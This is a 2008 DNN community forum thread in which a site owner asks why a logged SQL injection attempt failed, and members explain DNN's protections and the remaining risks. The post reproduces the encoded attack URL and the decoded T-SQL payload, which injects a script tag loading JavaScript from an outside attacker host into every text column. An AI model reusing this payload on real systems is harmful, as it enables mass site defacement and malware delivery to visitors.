Products

Evoq Content Overview Content Creation Workflow Asset Management Mobile Responsive Personalization Content Analytics SEO Integrations Security Website PerformanceEvoq Engage Overview Community Management  Dashboard  Analytics  Member Profile Gamification Advocate Marketing Community Engagement  Ideas  Answers  Discussions  Groups  Wikis  Events Mobile ReadyDNN Support PackagesEvoq: CMS FeaturesEvoq OnDemandCompare DNN's CMS Products

Solutions

Content Management SystemMulti-Channel PublishingDigital MarketingOnline Community ManagementIntranet Software SolutionOur CustomersPrime

Resources

Test DrivesSchedule A DemoDocumentation CenterWebinarsWhite PapersProduct ManualsRequest PricingData SheetsCase StudiesEvoq Preferred Products Content Management Ecommerce Forms Identity Management and Authentication Site Management Social Themes

Partners

DNN Partners Partner Directory Become a DNN Partner Partner Program Overview  Hosting  Implementation  ISV  Training  Competencies

Community

Participate Ask a Question Forums Community Showcase DNN MVP  Program Overview  Lifetime MVPs  Honorary MVPs Subscribe to DNN Digest Advisory Groups  Awareness Advisory Group  Developer Advisory Group  Partner Advisory Group  Technology Advisory GroupLearn Documentation Wiki Community Blog Video Library Project History Development RoadmapDownload DNN Store Language Packs Manuals Nightly BuildsSecurity Policies Security Center

Blog

About

News Press Releases News Coverage Press KitCareersContact DNN

QA

Ideas Test

New Community Website

Ordinarily, you'd be at the right spot, but we've recently launched a brand new community website... For the community, by the community.

Yay... Take Me to the Community!

Welcome to the DNN Community Forums, your preferred source of online community support for all things related to DNN.
In order to participate you must be a registered DNNizen
HomeHomeOur CommunityOur CommunityGeneral Discuss...General Discuss...My website has been attacked... DNN Security...My website has been attacked... DNN Security...
Previous
 
Next
New Post
10/21/2008 12:15 PM
 
Max Heppell

Joined: 2/22/2006
Posts: 42

hello,

My website has been attacked with SQL injection stuff.
I want to know if I was LUCKY that it didn't work OR if I can sleep in peace because DNN is proof on that side...

Here is the error I got in the EVENT LOG:

AssemblyVersion: 04.08.03
PortalID: 6
PortalName: my website
UserID: -1
UserName:
ActiveTabID: 171
ActiveTabName: Home
RawURL: /LinkClick.aspx?link=237&tabid=171';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C4043207661726368617228343030302%20AS%20CHAR(4000));EXEC(@S);
AbsoluteURL: /LinkClick.aspx
AbsoluteURLReferrer:
UserAgent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; (R1 1.5))
DefaultDataProvider: DotNetNuke.Data.SqlDataProvider, DotNetNuke.SqlDataProvider
ExceptionGUID: 269dadf2-75fa-4310-af9e-5825a9aad92f
InnerException: Unhandled Error:
FileName:
FileLineNumber: 0
FileColumnNumber: 0
Method: System.Number.StringToNumber
StackTrace:
Message: System.Exception: Unhandled Error: ---> System.formatException: Input string was not in a correct format.at System.Number.StringToNumber(String str, NumberStyles options, NumberBuffer& number, NumberformatInfo info, Boolean parseDecimal)at System.Number.ParseInt32(String s, NumberStyles style, NumberformatInfo info)at DotNetNuke.Services.FileSystem.FileServerHandler.ProcessRequest(HttpContext context)at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)--- End of inner exception stack trace ---
Source:
Server Name: DEDI568

 

I did a select of the CAST in SQL...and look what I've found...

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title>
<script src="http://www2.s800qn.cn/csrss/w.js"></script>
<!--''+['+@C+'] where '+@C+' not like ''%"></title>
<script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor    

 

So my website seems to be fine as all the content still the same and I don't find the .js file they tried to put...

I just want to understand WHY they fail, does DNN is proof on that side?

Thanks in advance for your answers!

Maks
 
New Post
10/21/2008 12:20 PM
 
Mitchel Sellers


Mitchel Sellers's Avatar

Mitchel Sellers's Avatar

Mitchel Sellers's Avatar

Mitchel Sellers's Avatar

Mitchel Sellers's Avatar

Mitchel Sellers's Avatar

www.mitchelsellers.com
Joined: 1/24/2007
Posts: 7846

The DNN error log entry shows that it has captured the code injection as an error and it DID NOT execute the code.

This has been a very common attack attempt in recent weeks.

-Mitchel Sellers
Microsoft MVP, ASPInsider, DNN MVP
CEO/Director of Development - IowaComputerGurus Inc.
LinkedIn Profile

Visit mitchelsellers.com for my mostly DNN Blog and support forum.

Visit IowaComputerGurus.com for free DNN Modules, DNN Performance Tips, DNN Consulting Quotes, and DNN Technical Support Services
 
New Post
10/21/2008 12:22 PM
 
Brian Dukes


Brian Dukes's Avatar

Brian Dukes's Avatar

www.engagesoftware.com
Joined: 8/25/2006
Posts: 896

The DNN core does not use ad hoc, dynamically compiled SQL, so attacks like these will not affect the core.  However, it is possible that 3rd party modules could be vulnerable to these attacks.  You'll need to make sure that you trust the vendors of your 3rd party modules in order to fully sleep in peace about SQL injection.

Hope that helps,

Brian Dukes
Engage Software
St. Louis, MO
866-907-4002
DNN partner specializing in custom, enterprise DNN development.
 
New Post
10/21/2008 12:35 PM
 
Brandon Haynes Haynes


brandonhaynes.org
Joined: 2/6/2006
Posts: 1172

Hi Max,

In addition to the insight provided above, I would also add that these attacks are almost exclusively automated.  It is unlikely that the attack was directed against your site specifically, but rather against large sets of IP addresses.  As such, expect many instances of these sorts of attempts in your event log.

In addition to the third-party module vector, other applications hosted on the same server (classic ASP, other ASP.NET, or even non-.NET) can also infect a DNN database (given that those extra-DNN applications can access the DNN database in the first place).  Proper application isolation can fully mitigate this risk, but I thought I would mention it nonetheless.

Brandon

Brandon Haynes
BrandonHaynes.org
 
New Post
10/21/2008 12:35 PM
 
Chris Hammond


Chris Hammond's Avatar

Chris Hammond's Avatar

Chris Hammond's Avatar

www.christoc.com
Joined: 1/14/2003
Posts: 7319

Recent weeks? More like months! My sites have been getting hit with this for quite a while now.

 

Chris Hammond
Former DNN Corp Employee, MVP, Core Team Member, Trustee
Christoc.com Software Solutions DotNetNuke Module Development, Upgrades and consulting.
dnnCHAT.com a chat room for DotNetNuke discussions
 
 Page 1 of 2
12Next 
Previous
 
Next
HomeHomeOur CommunityOur CommunityGeneral Discuss...General Discuss...My website has been attacked... DNN Security...My website has been attacked... DNN Security...


These Forums are dedicated to discussion of DNN Platform and Evoq Solutions.

For the benefit of the community and to protect the integrity of the ecosystem, please observe the following posting guidelines:

  1. No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DNN.
  2. No vendor trolling / poaching. If someone posts about a vendor issue, allow the vendor or other customers to respond. Any post that looks like trolling / poaching will be removed.
  3. Discussion or promotion of DNN Platform product releases under a different brand name are strictly prohibited.
  4. No Flaming or Trolling.
  5. No Profanity, Racism, or Prejudice.
  6. Site Moderators have the final word on approving / removing a thread or post or comment.
  7. English language posting only, please.
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out
What is Liquid Content?
Find Out